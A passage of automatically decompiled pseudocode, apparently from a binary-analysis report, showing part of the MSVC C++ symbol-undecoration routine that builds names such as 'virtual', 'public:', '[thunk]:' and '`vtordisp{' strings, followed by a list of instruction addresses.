                                                                      				E00000001180032D48( *(_t1003 + 0x58),  !((_t633 >> 0x00000002 |  *0x800738b8) >> 1), _t800, 0x8005fee0, _t1003 + 0x70, _t994, _t997, 0x8005fee0, _t1033, _t1037, _t1037);
                                                                      				if ( *(_t800 + 8) - 1 <= 0) goto 0x80031cbb;
                                                                      				 *(_t1003 + 0x48) =  *(_t800 + 8) & 0x000000ff;
                                                                      				if (r13d == 0) goto 0x80031e47;
                                                                      				if (r12d != 0x1800) goto 0x80031e47;
                                                                      				r8b = 0x7b;
                                                                      				E0000000118002E9B8(_t1040, _t1003 + 0x50);
                                                                      				_t836 = _t800;
                                                                      				E0000000118003066C(0, 0, _t836, _t1003 + 0x30, _t994, _t997, __r10, __r11, _t1037);
                                                                      				E0000000118002E98C(_t836, _t1003 + 0x70, _t1003 + 0x30);
                                                                      				E0000000118002EC28(0, _t1003 + 0x40, _t800, _t1003 + 0x30);
                                                                      				E00000001180035C70(_t1003 + 0x30);
                                                                      				if (( *0x800738b8 & 0x00001000) != 0) goto 0x80031d93;
                                                                      				 *(_t1003 + 0x70) =  *(_t1003 + 0x70) & 0x00000000;
                                                                      				 *(_t1003 + 0x78) =  *(_t1003 + 0x78) & 0x00000000;
                                                                      				 *(_t1003 + 0x50) = "}\' ";
                                                                      				r13d = 3;
                                                                      				 *(_t1003 + 0x58) = r13d;
                                                                      				asm("movaps xmm0, [esp+0x50]");
                                                                      				asm("movdqa [esp+0x50], xmm0");
                                                                      				E0000000118002EE78(0x2c, "}\' ", _t836, _t1003 + 0x70);
                                                                      				_t65 = _t1000 - 0x50; // -77
                                                                      				E0000000118002E98C(_t1003 + 0x70, _t65, _t1003 + 0x30);
                                                                      				_t68 = _t1000 - 0x40; // -61
                                                                      				_t69 = _t1000 - 0x50; // -77
                                                                      				E0000000118002E960(_t69, _t68, _t1003 + 0x50);
                                                                      				E0000000118002EC28(0, _t1003 + 0x40, "}\' ", _t1003 + 0x50);
                                                                      				_t802 = "}\'";
                                                                      				 *(_t1003 + 0x58) = 2;
                                                                      				 *(_t1003 + 0x50) = _t802;
                                                                      				asm("movaps xmm0, [esp+0x50]");
                                                                      				asm("movdqa [esp+0x30], xmm0");
                                                                      				E0000000118002EAA8(_t802, _t836, _t1003 + 0x40, _t1003 + 0x30);
                                                                      				E00000001180032F88(_t836, _t1003 + 0x30, _t994, _t1035, _t1033);
                                                                      				_t639 =  *0x800738b8; // 0x0
                                                                      				if (( !(_t639 >> 1) & 0x00000001) == 0) goto 0x80031e3f;
                                                                      				if (( !(_t639 >> 4) & 0x00000001) == 0) goto 0x80031e3f;
                                                                      				if ((0x00001000 & _t639) != 0) goto 0x80031e3f;
                                                                      				 *(_t1003 + 0x70) =  *(_t1003 + 0x70) & 0x00000000;
                                                                      				 *(_t1003 + 0x78) =  *(_t1003 + 0x78) & 0x00000000;
                                                                      				E0000000118002EE78(0x20, _t802, _t836, _t1003 + 0x70);
                                                                      				E0000000118002E98C(_t1003 + 0x70, _t1003 + 0x50, _t1003 + 0x30);
                                                                      				r8b = 0x20;
                                                                      				_t90 = _t1000 - 0x50; // -77
                                                                      				E0000000118002E9B8(_t1003 + 0x50, _t90);
                                                                      				_t860 = _t802;
                                                                      				_t93 = _t1000 - 0x40; // -61
                                                                      				E0000000118002E98C(_t860, _t93, _t1003 + 0x40);
                                                                      				goto 0x800326c1;
                                                                      				goto 0x800326d0;
                                                                      				 *(_t1000 - 0x40) = _t860;
                                                                      				 *(_t1000 - 0x38) = _t639;
                                                                      				 *(_t1000 - 0x50) = _t860;
                                                                      				 *(_t1000 - 0x48) = _t639;
                                                                      				 *(_t1000 - 0x60) = _t860;
                                                                      				 *(_t1000 - 0x58) = _t639;
                                                                      				 *(_t1003 + 0x70) = _t860;
                                                                      				 *(_t1003 + 0x78) = _t639;
                                                                      				 *(_t1000 - 0x30) = _t860;
                                                                      				 *(_t1000 - 0x28) = _t639;
                                                                      				if (r13d == 0) goto 0x80031f09;
                                                                      				if (r12d != 0x800) goto 0x80031ee9;
                                                                      				if ((_t699 & 0x00000700) != 0x600) goto 0x80031ec6;
                                                                      				E0000000118003066C(_t639, 1, _t836, _t1003 + 0x50, _t994, _t997, __r10, __r11, _t1037);
                                                                      				 *(_t1000 - 0x40) =  *(_t1003 + 0x50);
                                                                      				 *(_t1000 - 0x38) =  *(_t1003 + 0x58);
                                                                      				E0000000118003066C(_t639, 1, _t836, _t1003 + 0x50, _t994, _t997, __r10, __r11, _t1037);
                                                                      				 *(_t1000 - 0x50) =  *(_t1003 + 0x50);
                                                                      				_t464 =  *(_t1003 + 0x58);
                                                                      				 *(_t1000 - 0x48) = _t464;
                                                                      				goto 0x80031ecd;
                                                                      				if (_t464 != 0x500) goto 0x80031ee9;
                                                                      				E0000000118003066C(_t639, 1, _t836, _t1003 + 0x50, _t994, _t997, __r10, __r11, _t1037);
                                                                      				 *(_t1000 - 0x60) =  *(_t1003 + 0x50);
                                                                      				 *(_t1000 - 0x58) =  *(_t1003 + 0x58);
                                                                      				_t864 = _t1003 + 0x50;
                                                                      				E0000000118003066C(_t639, 1, _t836, _t864, _t994, _t997, _t1031, _t1032, _t1037);
                                                                      				 *(_t1003 + 0x70) =  *(_t1003 + 0x50);
                                                                      				 *(_t1003 + 0x78) =  *(_t1003 + 0x58);
                                                                      				if (r12d != 0x800) goto 0x80031f97;
                                                                      				if ((_t699 & 0x00000700) == 0x200) goto 0x80031f97;
                                                                      				_t471 =  *0x800738b8; // 0x0
                                                                      				r8d = 0;
                                                                      				 *(_t1003 + 0x50) = _t864;
                                                                      				 *(_t1003 + 0x58) = 0;
                                                                      				 *(_t1003 + 0x20) = 1;
                                                                      				if ((_t471 & 0x00000060) == 0x60) goto 0x80031f6e;
                                                                      				 *(_t1000 - 0x80) = _t864;
                                                                      				 *(_t1000 - 0x78) = 0;
                                                                      				_t132 = _t1000 - 0x80; // 0xf80
                                                                      				_t865 = _t1003 + 0x30;
                                                                      				E000000011800334C4(_t836, _t865, _t132, _t994, _t997, _t1003 + 0x50);
                                                                      				_t807 =  *(_t1003 + 0x30);
                                                                      				 *(_t1000 - 0x30) = _t807;
                                                                      				goto 0x80031f94;
                                                                      				 *(_t1003 + 0x30) = _t865;
                                                                      				 *(_t1003 + 0x38) = 0;
                                                                      				_t141 = _t1000 - 0x80; // 0xf80
                                                                      				E000000011800334C4(_t836, _t141, _t1003 + 0x50, _t994, _t997, _t1003 + 0x30);
                                                                      				if ( *(_t1000 - 0x78) - 1 <= 0) goto 0x80031f97;
                                                                      				 *(_t1000 - 0x28) =  *(_t1000 - 0x78) & 0x000000ff;
                                                                      				_t641 =  *0x800738b8; // 0x0
                                                                      				r13d = 3;
                                                                      				if (( !(_t641 >> 1) & 0x00000001) == 0) goto 0x80032062;
                                                                      				_t643 =  !(_t641 >> 4);
                                                                      				if (( !(_t641 >> 4) & 0x00000001) == 0) goto 0x80032039;
                                                                      				E00000001180032F88(_t836, _t1003 + 0x30, _t994, _t994, _t996);
                                                                      				E0000000118002E98C(_t807, _t1003 + 0x50, _t1003 + 0x40);
                                                                      				_t869 =  *_t807;
                                                                      				 *(_t1003 + 0x40) = _t869;
                                                                      				 *(_t1003 + 0x48) =  *(_t807 + 8);
                                                                      				_t808 =  *_t1040;
                                                                      				if (_t808 == 0) goto 0x80032076;
                                                                      				if (_t869 == 0) goto 0x80032069;
                                                                      				if (( *0x800738b8 & 0x00001000) != 0) goto 0x80032069;
                                                                      				 *(_t1000 - 0x80) = _t836;
                                                                      				_t158 = _t1000 - 0x80; // -125
                                                                      				 *(_t1000 - 0x78) = 0;
                                                                      				E0000000118002EE78(0x20, _t808, _t836, _t158);
                                                                      				_t161 = _t1000 - 0x80; // -125
                                                                      				E0000000118002E98C(_t161, _t1003 + 0x30, _t1040);
                                                                      				E0000000118002EC28( !(_t641 >> 4), _t1003 + 0x40, _t1003 + 0x30, _t1040);
                                                                      				goto 0x80032076;
                                                                      				E00000001180032F88(_t836, _t1003 + 0x40, _t994);
                                                                      				if ( *(_t1003 + 0x48) == r13b) goto 0x80031fe6;
                                                                      				if ( *(_t808 + 8) - 1 <= 0) goto 0x80031fe6;
                                                                      				 *(_t1003 + 0x48) = 0;
                                                                      				goto 0x80031fe6;
                                                                      				goto 0x80032039;
                                                                      				 *(_t1003 + 0x40) = _t808;
                                                                      				 *(_t1003 + 0x48) =  *(_t1040 + 8);
                                                                      				 *(_t1000 - 0x80) = _t836;
                                                                      				 *(_t1000 - 0x70) = 0;
                                                                      				if ( *(_t1000 + 0x78) == (0 |  *(_t808 + 8) & 0x000000ff)) goto 0x80032194;
                                                                      				_t176 = _t1000 - 0x10; // -13
                                                                      				E000000011800330C8(_t176);
                                                                      				 *(_t1003 + 0x50) =  *(_t1003 + 0x50) & _t836;
                                                                      				 *(_t1003 + 0x58) =  *(_t1003 + 0x58) & r15d;
                                                                      				_t837 = _t808;
                                                                      				E0000000118002EE78(0x20, _t808, _t837, _t1003 + 0x50);
                                                                      				E0000000118002E98C(_t1003 + 0x50, _t1003 + 0x30, _t837);
                                                                      				E0000000118002EC28( !(_t641 >> 4), _t1003 + 0x40, _t1003 + 0x30, _t837);
                                                                      				if (( *0x800738b8 & 0x00001000) != 0) goto 0x80032988;
                                                                      				if ( *(_t1000 - 0x6c) == 0) goto 0x800322a7;
                                                                      				if (r12d != 0x800) goto 0x8003223c;
                                                                      				if ((_t699 & 0x00000700) != 0x600) goto 0x800321d6;
                                                                      				 *(_t1003 + 0x38) = 0xc;
                                                                      				_t809 = "`vtordispex{";
                                                                      				 *(_t1003 + 0x30) = _t809;
                                                                      				asm("movaps xmm0, [esp+0x30]");
                                                                      				_t192 = _t1000 - 0x10; // -13
                                                                      				asm("movdqa [esp+0x30], xmm0");
                                                                      				E0000000118002E4E4(_t192, _t1003 + 0x30);
                                                                      				_t193 = _t1000 - 0x40; // -61
                                                                      				E0000000118002E98C(_t809, _t1003 + 0x30, _t193);
                                                                      				r8b = 0x2c;
                                                                      				E0000000118002E9B8(_t1003 + 0x30, _t1003 + 0x50);
                                                                      				_t197 = _t1000 - 0x50; // -77
                                                                      				E0000000118002E98C(_t809, _t1000, _t197);
                                                                      				r8b = 0x2c;
                                                                      				_t198 = _t1000 + 0x10; // 0x13
                                                                      				E0000000118002E9B8(_t809, _t198);
                                                                      				_t199 = _t1000 - 0x60; // -93
                                                                      				_t200 = _t1000 - 0x20; // -29
                                                                      				E0000000118002E98C(_t809, _t200, _t199);
                                                                      				goto 0x80032225;
                                                                      				E0000000118002E384(_t809, _t837, 0x800738d0, _t1003 + 0x60, _t997, _t999);
                                                                      				if (_t809 == 0) goto 0x800321b5;
                                                                      				 *_t809 = _t837;
                                                                      				_t809[1] = 0;
                                                                      				goto 0x800321b8;
                                                                      				_t1043 = _t837;
                                                                      				_t203 = _t1000 - 0x10; // -13
                                                                      				E000000011800330C8(_t203);
                                                                      				_t503 = _t809[1];
                                                                      				 *(_t1000 - 0x80) =  *_t809;
                                                                      				 *(_t1000 - 0x70) = _t503;
                                                                      				goto 0x800320e0;
                                                                      				if (_t503 != 0x500) goto 0x8003223c;
                                                                      				 *(_t1003 + 0x38) = 0xa;
                                                                      				 *(_t1003 + 0x30) = "`vtordisp{";
                                                                      				asm("movaps xmm0, [esp+0x30]");
                                                                      				asm("movdqa [esp+0x30], xmm0");
                                                                      				E0000000118002E4E4(_t1003 + 0x60, _t1003 + 0x30);
                                                                      				_t211 = _t1000 - 0x60; // -93
                                                                      				E0000000118002E98C("`vtordisp{", _t1003 + 0x30, _t211);
                                                                      				_t213 = _t1000 - 0x20; // -29
                                                                      				r8b = 0x2c;
                                                                      				E0000000118002E9B8(_t1003 + 0x30, _t213);
                                                                      				E0000000118002EC28( !(_t641 >> 4), _t1003 + 0x40, "`vtordisp{", _t211);
                                                                      				goto 0x8003226a;
                                                                      				 *(_t1003 + 0x38) = 0xa;
                                                                      				 *(_t1003 + 0x30) = "`adjustor{";
                                                                      				asm("movaps xmm0, [esp+0x30]");
                                                                      				asm("movdqa [esp+0x30], xmm0");
                                                                      				E0000000118002EAA8("`adjustor{", _t837, _t1003 + 0x40, _t1003 + 0x30);
                                                                      				 *(_t1003 + 0x38) = r13d;
                                                                      				_t812 = "}\' ";
                                                                      				 *(_t1003 + 0x30) = _t812;
                                                                      				asm("movaps xmm0, [esp+0x30]");
                                                                      				asm("movdqa [esp+0x30], xmm0");
                                                                      				E0000000118002E960(_t1003 + 0x70, _t1003 + 0x60, _t1003 + 0x30);
                                                                      				E0000000118002EC28(_t643, _t1003 + 0x40, _t812, _t1003 + 0x30);
                                                                      				if ( *0x800738cc != 1) goto 0x800322c2;
                                                                      				_t511 =  *0x800738c8; // 0x0
                                                                      				_t512 =  ==  ?  *((void*)(_t1000 - 0x68)) : _t511;
                                                                      				 *0x800738c8 =  ==  ?  *((void*)(_t1000 - 0x68)) : _t511;
                                                                      				E00000001180035254(_t837, _t1003 + 0x60, _t812);
                                                                      				 *(_t1003 + 0x50) =  *(_t1003 + 0x50) & 0x00000000;
                                                                      				 *(_t1003 + 0x58) =  *(_t1003 + 0x58) & 0x00000000;
                                                                      				_t838 = _t812;
                                                                      				E0000000118002EE78(0x28, _t812, _t838, _t1003 + 0x50);
                                                                      				_t1020 = _t838;
                                                                      				E0000000118002E98C(_t1003 + 0x50, _t1003 + 0x30, _t838);
                                                                      				r8b = 0x29;
                                                                      				_t235 = _t1000 - 0x20; // -29
                                                                      				E0000000118002E9B8(_t1003 + 0x30, _t235);
                                                                      				E0000000118002EC28(_t643, _t1003 + 0x40, _t812, _t838);
                                                                      				if (r12d != 0x800) goto 0x8003233b;
                                                                      				if ((_t699 & 0x00000700) == 0x200) goto 0x8003233b;
                                                                      				_t238 = _t1000 - 0x30; // -45
                                                                      				E0000000118002EC28(_t643, _t1003 + 0x40, _t238, _t838);
                                                                      				_t521 =  *0x800738b8; // 0x0
                                                                      				if ((0x00000001 &  !(_t521 >> 0x13)) == 0) goto 0x80032368;
                                                                      				E000000011800355CC(1, _t643, _t838, _t1003 + 0x60, _t994, _t997);
                                                                      				E0000000118002EC28(_t643, _t1003 + 0x40, _t812, _t838);
                                                                      				goto 0x8003238d;
                                                                      				E000000011800355CC(1, _t643, _t838, _t1003 + 0x40, _t994, _t997);
                                                                      				if ( *(_t1003 + 0x48) == r13b) goto 0x8003238d;
                                                                      				if (_t812[1] - 1 <= 0) goto 0x8003238d;
                                                                      				 *(_t1003 + 0x48) =  *(_t1003 + 0x48) & 0xffffff00 | _t812[1] & 0x000000ff;
                                                                      				E00000001180035568(_t1003 + 0x60);
                                                                      				E0000000118002EC28( *(_t1003 + 0x48) & 0xffffff00 | _t812[1] & 0x000000ff, _t1003 + 0x40, _t812, _t838);
                                                                      				_t530 =  *0x800738b8; // 0x0
                                                                      				if ((0x00000001 &  !(_t530 >> 8)) == 0) goto 0x800323cc;
                                                                      				E00000001180035544(_t1003 + 0x60);
                                                                      				E0000000118002EC28( *(_t1003 + 0x48) & 0xffffff00 | _t812[1] & 0x000000ff, _t1003 + 0x40, _t812, _t1020);
                                                                      				goto 0x800323f1;
                                                                      				E00000001180035544(_t1003 + 0x40);
                                                                      				if ( *(_t1003 + 0x48) == r13b) goto 0x800323f1;
                                                                      				if (_t812[1] - 1 <= 0) goto 0x800323f1;
                                                                      				 *(_t1003 + 0x48) =  *(_t1003 + 0x48) & 0xffffff00 | _t812[1] & 0x000000ff;
                                                                      				E00000001180035798(_t812[1] & 0x000000ff, _t1003 + 0x60);
                                                                      				if ( *(_t1003 + 0x48) == r13b) goto 0x8003241b;
                                                                      				if (_t812[1] - 1 <= 0) goto 0x8003241b;
                                                                      				 *(_t1003 + 0x48) =  *(_t1003 + 0x48) & 0xffffff00 | _t812[1] & 0x000000ff;
                                                                      				_t539 =  *0x800738b8; // 0x0
                                                                      				if ((0x00000001 &  !(_t539 >> 2)) == 0) goto 0x80031e3f;
                                                                      				if (_t1043 == 0) goto 0x80031e3f;
                                                                      				_t622 =  *(_t1000 + 0x68);
                                                                      				 *_t1043 =  *(_t1003 + 0x40);
                                                                      				 *(_t1043 + 8) =  *(_t1003 + 0x48);
                                                                      				 *(_t1003 + 0x40) =  *(_t1000 - 0x80);
                                                                      				goto 0x800326cc;
                                                                      				r13d = 0x6000;
                                                                      				_t909 = _t1003 + 0x40;
                                                                      				E0000000118002EC28( *(_t1003 + 0x48) & 0xffffff00 | _t812[1] & 0x000000ff, _t909, _t1043, _t1020);
                                                                      				r9d = 0x7c00;
                                                                      				if (r14d != 0) goto 0x8003250c;
                                                                      				_t276 = _t909 - 0x6800; // -26624
                                                                      				if ((_t276 & 0xfffff7ff) != 0) goto 0x800324a1;
                                                                      				E000000011800359D4(_t622, 0x28, _t838, _t997, _t1003 + 0x40, _t994, _t997, _t1020, _t1033);
                                                                      				goto 0x80032997;
                                                                      				if ((_t699 & r9d) != r13d) goto 0x8003250c;
                                                                      				_t815 = "}\'";
                                                                      				 *(_t1003 + 0x38) = 2;
                                                                      				 *(_t1003 + 0x30) = _t815;
                                                                      				asm("movaps xmm0, [esp+0x30]");
                                                                      				r8b = 0x7b;
                                                                      				asm("movdqa [esp+0x50], xmm0");
                                                                      				E0000000118002E9B8(_t1003 + 0x40, _t1003 + 0x60);
                                                                      				_t839 = _t815;
                                                                      				E0000000118003066C(_t699 & r9d, 0, _t839, _t1003 + 0x30, _t994, _t997, _t1031, _t1032, _t1037);
                                                                      				_t286 = _t1000 - 0x20; // 0x5fe0
                                                                      				E0000000118002E98C(_t839, _t286, _t1003 + 0x30);
                                                                      				E0000000118002E960(_t815, _t997, _t1003 + 0x50);
                                                                      				goto 0x80032997;
                                                                      				if ((_t699 & 0x0000fc00) != r9d) goto 0x8003252a;
                                                                      				E00000001180035BF4(_t622, _t699 & r9d, (_t699 & 0x0000fc00) - r9d, _t997, _t1003 + 0x40, _t994, _t997, _t1003 + 0x50, _t1033);
                                                                      				goto 0x80032997;
                                                                      				r12d = _t699;
                                                                      				r12d = r12d & 0x00001800;
                                                                      				r15d = 0x1200;
                                                                      				_t656 = 0 | r12d == 0x00000800;
                                                                      				 *(_t1000 + 0x70) = _t656;
                                                                      				r13d = 0x1100;
                                                                      				_t623 = _t622 & 0xffffff00 | (r13d & _t699) == 0x00000000;
                                                                      				_t555 =  !=  ? _t656 : _t623;
                                                                      				_t556 =  ~( !=  ? _t656 : _t623);
                                                                      				asm("sbb edx, edx");
                                                                      				if (r14d == 0) goto 0x80032630;
                                                                      				r8d = _t699;
                                                                      				r8d = r8d & 0x00001b00;
                                                                      				asm("sbb eax, eax");
                                                                      				if (((0 | r8d == 0x00001000) &  ~r14d) == 0) goto 0x800325c9;
                                                                      				 *(_t1003 + 0x38) = 0x20;
                                                                      				 *(_t1003 + 0x30) = "`local static destructor helper\'";
                                                                      				asm("movaps xmm0, [esp+0x30]");
                                                                      				asm("movdqa [esp+0x30], xmm0");
                                                                      				E0000000118002EAA8("`local static destructor helper\'", _t839, _t1003 + 0x40, _t1003 + 0x30);
                                                                      				goto 0x80032649;
                                                                      				asm("sbb eax, eax");
                                                                      				if (((0 | r8d == r13d) &  ~r14d) == 0) goto 0x8003260c;
                                                                      				 *(_t1003 + 0x38) = 0x30;
                                                                      				 *(_t1003 + 0x30) = "`template static data member constructor helper\'";
                                                                      				asm("movaps xmm0, [esp+0x30]");
                                                                      				asm("movdqa [esp+0x30], xmm0");
                                                                      				E0000000118002EAA8("`template static data member constructor helper\'", _t839, _t1003 + 0x40, _t1003 + 0x30);
                                                                      				goto 0x80032677;
                                                                      				asm("sbb eax, eax");
                                                                      				if (((0 | r8d == r15d) &  ~r14d) == 0) goto 0x80032630;
                                                                      				 *(_t1003 + 0x38) = 0x2f;
                                                                      				goto 0x800325eb;
                                                                      				if (r14d != 0) goto 0x80032645;
                                                                      				if ((_t699 & r9d) == 0x7800) goto 0x80032988;
                                                                      				if ((0x1000 & _t699) == 0) goto 0x800326b2;
                                                                      				_t695 = _t699 & 0x00001b00;
                                                                      				asm("sbb eax, eax");
                                                                      				if (((0 | _t695 == r13d) &  ~r14d) != 0) goto 0x80032677;
                                                                      				asm("sbb eax, eax");
                                                                      				if ((_t695 == r15d &  ~r14d) == 0) goto 0x800326b2;
                                                                      				 *(_t1003 + 0x50) =  *(_t1003 + 0x50) & 0x00000000;
                                                                      				 *(_t1003 + 0x58) =  *(_t1003 + 0x58) & 0x00000000;
                                                                      				E0000000118002EE78(0x20, "`template static data member destructor helper\'", _t839, _t1003 + 0x50);
                                                                      				E0000000118002E98C(_t1003 + 0x50, _t1003 + 0x30, _t1003 + 0x40);
                                                                      				_t819 =  *(_t1003 + 0x30);
                                                                      				 *(_t1003 + 0x40) = _t819;
                                                                      				goto 0x800326cc;
                                                                      				E000000011800358DC(_t623, _t695 == r15d, _t695 == r15d &  ~r14d, _t819, _t839, _t1003 + 0x60, _t1003 + 0x40, _t997, _t1003 + 0x40);
                                                                      				 *(_t1003 + 0x40) =  *_t819;
                                                                      				 *(_t1003 + 0x48) =  *(_t819 + 8);
                                                                      				r13d = 0xb;
                                                                      				_t624 =  !=  ?  *(_t1000 + 0x70) : _t623;
                                                                      				 *(_t1000 + 0x68) = _t624;
                                                                      				r15d = _t1035 - 3;
                                                                      				if (_t624 == 0) goto 0x800328c6;
                                                                      				_t576 =  *0x800738b8; // 0x0
                                                                      				if (( !(_t576 >> 9) & 0x00000001) == 0) goto 0x800327f1;
                                                                      				_t626 = _t699 & 0x00000700;
                                                                      				_t777 = _t626 - 0x200;
                                                                      				_t580 =  !=  ? _t777 == 0 : _t1035 - 0xa;
                                                                      				_t779 =  !=  ? _t777 == 0 : _t1035 - 0xa;
                                                                      				if (( !=  ? _t777 == 0 : _t1035 - 0xa) == 0) goto 0x80032774;
                                                                      				 *(_t1003 + 0x38) = 7;
                                                                      				 *(_t1003 + 0x30) = "static ";
                                                                      				asm("movaps xmm0, [esp+0x30]");
                                                                      				asm("movdqa [esp+0x30], xmm0");
                                                                      				E0000000118002E4E4(_t1003 + 0x60, _t1003 + 0x30);
                                                                      				E0000000118002E98C("static ", _t1003 + 0x30, _t1003 + 0x40);
                                                                      				 *(_t1003 + 0x40) =  *(_t1003 + 0x30);
                                                                      				 *(_t1003 + 0x48) =  *(_t1003 + 0x38);
                                                                      				if (r14d == 0) goto 0x80032781;
                                                                      				_t781 = _t626 - 0x100;
                                                                      				if (_t781 == 0) goto 0x8003279c;
                                                                      				asm("bt edi, 0xa");
                                                                      				if (_t781 >= 0) goto 0x800327eb;
                                                                      				_t359 = _t839 - 0x400; // 0xe00
                                                                      				if ((_t359 & 0xfffffcff) != 0) goto 0x800327eb;
                                                                      				if (_t626 == 0x700) goto 0x800327eb;
                                                                      				 *(_t1003 + 0x38) = r15d;
                                                                      				 *(_t1003 + 0x30) = "virtual ";
                                                                      				asm("movaps xmm0, [esp+0x30]");
                                                                      				asm("movdqa [esp+0x30], xmm0");
                                                                      				E0000000118002E4E4(_t1003 + 0x60, _t1003 + 0x30);
                                                                      				E0000000118002E98C("virtual ", _t1003 + 0x30, _t1003 + 0x40);
                                                                      				 *(_t1003 + 0x40) =  *(_t1003 + 0x30);
                                                                      				 *(_t1003 + 0x48) =  *(_t1003 + 0x38);
                                                                      				_t588 =  *0x800738b8; // 0x0
                                                                      				if (( !(_t588 >> 7) & 0x00000001) == 0) goto 0x800328c6;
                                                                      				_t698 = _t699 & 0x000000c0;
                                                                      				_t785 = _t698 - 0x40;
                                                                      				_t671 =  !=  ? _t785 == 0 :  *(_t1000 + 0x70);
                                                                      				_t787 =  !=  ? _t785 == 0 :  *(_t1000 + 0x70);
                                                                      				if (( !=  ? _t785 == 0 :  *(_t1000 + 0x70)) == 0) goto 0x8003282f;
                                                                      				 *(_t1003 + 0x38) = 9;
                                                                      				goto 0x80032883;
                                                                      				_t788 = _t698 - 0x80;
                                                                      				_t789 = r12d - 0x1000;
                                                                      				_t595 =  !=  ? _t788 == 0 : _t789 == 0;
                                                                      				_t791 =  !=  ? _t788 == 0 : _t789 == 0;
                                                                      				if (( !=  ? _t788 == 0 : _t789 == 0) == 0) goto 0x8003285e;
                                                                      				 *(_t1003 + 0x38) = r13d;
                                                                      				goto 0x80032883;
                                                                      				_t792 = _t698;
                                                                      				_t793 = r12d;
                                                                      				_t598 =  !=  ? _t792 == 0 : _t793 == 0;
                                                                      				_t795 =  !=  ? _t792 == 0 : _t793 == 0;
                                                                      				if (( !=  ? _t792 == 0 : _t793 == 0) == 0) goto 0x800328c6;
                                                                      				 *(_t1003 + 0x38) = r15d;
                                                                      				 *(_t1003 + 0x30) = "public: ";
                                                                      				asm("movaps xmm0, [esp+0x30]");
                                                                      				asm("movdqa [esp+0x30], xmm0");
                                                                      				E0000000118002E4E4(_t1003 + 0x60, _t1003 + 0x30);
                                                                      				E0000000118002E98C("public: ", _t1003 + 0x30, _t1003 + 0x40);
                                                                      				 *(_t1003 + 0x40) =  *(_t1003 + 0x30);
                                                                      				_t601 =  *(_t1003 + 0x38);
                                                                      				 *(_t1003 + 0x48) = _t601;
                                                                      				asm("sbb eax, eax");
                                                                      				if ((_t699 & (_t601 & 0xfffff400) + 0x00001000) == 0) goto 0x80032933;
                                                                      				_t797 =  *0x800738b8 & 0x00001000;
                                                                      				if (_t797 != 0) goto 0x80032933;
                                                                      				 *(_t1003 + 0x38) = r15d;
                                                                      				 *(_t1003 + 0x30) = "[thunk]:";
                                                                      				asm("movaps xmm0, [esp+0x30]");
                                                                      				asm("movdqa [esp+0x30], xmm0");
                                                                      				E0000000118002E4E4(_t1003 + 0x60, _t1003 + 0x30);
                                                                      				E0000000118002E98C("[thunk]:", _t1003 + 0x30, _t1003 + 0x40);
                                                                      				 *(_t1003 + 0x40) =  *(_t1003 + 0x30);
                                                                      				 *(_t1003 + 0x48) =  *(_t1003 + 0x38);
                                                                      				asm("bt edi, 0x10");
                                                                      				if (_t797 >= 0) goto 0x80032988;
                                                                      				 *(_t1003 + 0x38) = r13d;
                                                                      				 *(_t1003 + 0x30) = "extern \"C\" ";
                                                                      				asm("movaps xmm0, [esp+0x30]");
                                                                      				asm("movdqa [esp+0x30], xmm0");
                                                                      				E0000000118002E4E4(_t1003 + 0x60, _t1003 + 0x30);
                                                                      				E0000000118002E98C("extern \"C\" ", _t1003 + 0x30, _t1003 + 0x40);
                                                                      				 *(_t1003 + 0x40) =  *(_t1003 + 0x30);
                                                                      				 *(_t1003 + 0x48) =  *(_t1003 + 0x38);
                                                                      				 *_t997 =  *(_t1003 + 0x40);
                                                                      				_t610 =  *(_t1003 + 0x48);
                                                                      				 *(_t997 + 8) = _t610;
                                                                      				return _t610;
                                                                      			}








































































                                                                      0x180031b10
                                                                      0x180031b10
                                                                      0x180031b10
                                                                      0x180031b20
                                                                      0x180031b25
                                                                      0x180031b2c
                                                                      0x180031b3a
                                                                      0x180031b3d
                                                                      0x180031b43
                                                                      0x180031b46
                                                                      0x180031b49
                                                                      0x180031b52
                                                                      0x180031b5a
                                                                      0x180031b64
                                                                      0x180031b66
                                                                      0x180031b6d
                                                                      0x180031b6f
                                                                      0x180031b78
                                                                      0x180031b7a
                                                                      0x180031b7d
                                                                      0x180031b80
                                                                      0x180031b84
                                                                      0x180031b8f
                                                                      0x180031b91
                                                                      0x180031b9c
                                                                      0x180031b9f
                                                                      0x180031ba7
                                                                      0x180031bac
                                                                      0x180031bb1
                                                                      0x180031bb6
                                                                      0x180031bbc
                                                                      0x180031bbe
                                                                      0x180031bc5
                                                                      0x180031bca
                                                                      0x180031bd2
                                                                      0x180031bd8
                                                                      0x180031bdf
                                                                      0x180031be9
                                                                      0x180031bec
                                                                      0x180031c00
                                                                      0x180031c06
                                                                      0x180031c13
                                                                      0x180031c16
                                                                      0x180031c1a
                                                                      0x180031c1d
                                                                      0x180031c21
                                                                      0x180031c2b
                                                                      0x180031c36
                                                                      0x180031c38
                                                                      0x180031c3e
                                                                      0x180031c44
                                                                      0x180031c48
                                                                      0x180031c4a
                                                                      0x180031c65
                                                                      0x180031c67
                                                                      0x180031c6c
                                                                      0x180031c77
                                                                      0x180031c81
                                                                      0x180031c93
                                                                      0x180031c98
                                                                      0x180031ca1
                                                                      0x180031ca6
                                                                      0x180031ca8
                                                                      0x180031cb1
                                                                      0x180031cb7
                                                                      0x180031cc0
                                                                      0x180031ccd
                                                                      0x180031cd3
                                                                      0x180031cde
                                                                      0x180031cea
                                                                      0x180031ced
                                                                      0x180031cff
                                                                      0x180031d0c
                                                                      0x180031d16
                                                                      0x180031d26
                                                                      0x180031d28
                                                                      0x180031d35
                                                                      0x180031d3f
                                                                      0x180031d44
                                                                      0x180031d4a
                                                                      0x180031d51
                                                                      0x180031d56
                                                                      0x180031d5c
                                                                      0x180031d66
                                                                      0x180031d6f
                                                                      0x180031d79
                                                                      0x180031d7d
                                                                      0x180031d81
                                                                      0x180031d8e
                                                                      0x180031d93
                                                                      0x180031d9a
                                                                      0x180031da2
                                                                      0x180031dac
                                                                      0x180031db6
                                                                      0x180031dbc
                                                                      0x180031dc6
                                                                      0x180031dcb
                                                                      0x180031dd9
                                                                      0x180031de4
                                                                      0x180031de8
                                                                      0x180031dea
                                                                      0x180031df5
                                                                      0x180031dfc
                                                                      0x180031e10
                                                                      0x180031e15
                                                                      0x180031e18
                                                                      0x180031e21
                                                                      0x180031e2b
                                                                      0x180031e2e
                                                                      0x180031e32
                                                                      0x180031e3a
                                                                      0x180031e42
                                                                      0x180031e47
                                                                      0x180031e4b
                                                                      0x180031e4e
                                                                      0x180031e52
                                                                      0x180031e55
                                                                      0x180031e59
                                                                      0x180031e5c
                                                                      0x180031e61
                                                                      0x180031e65
                                                                      0x180031e69
                                                                      0x180031e6f
                                                                      0x180031e7c
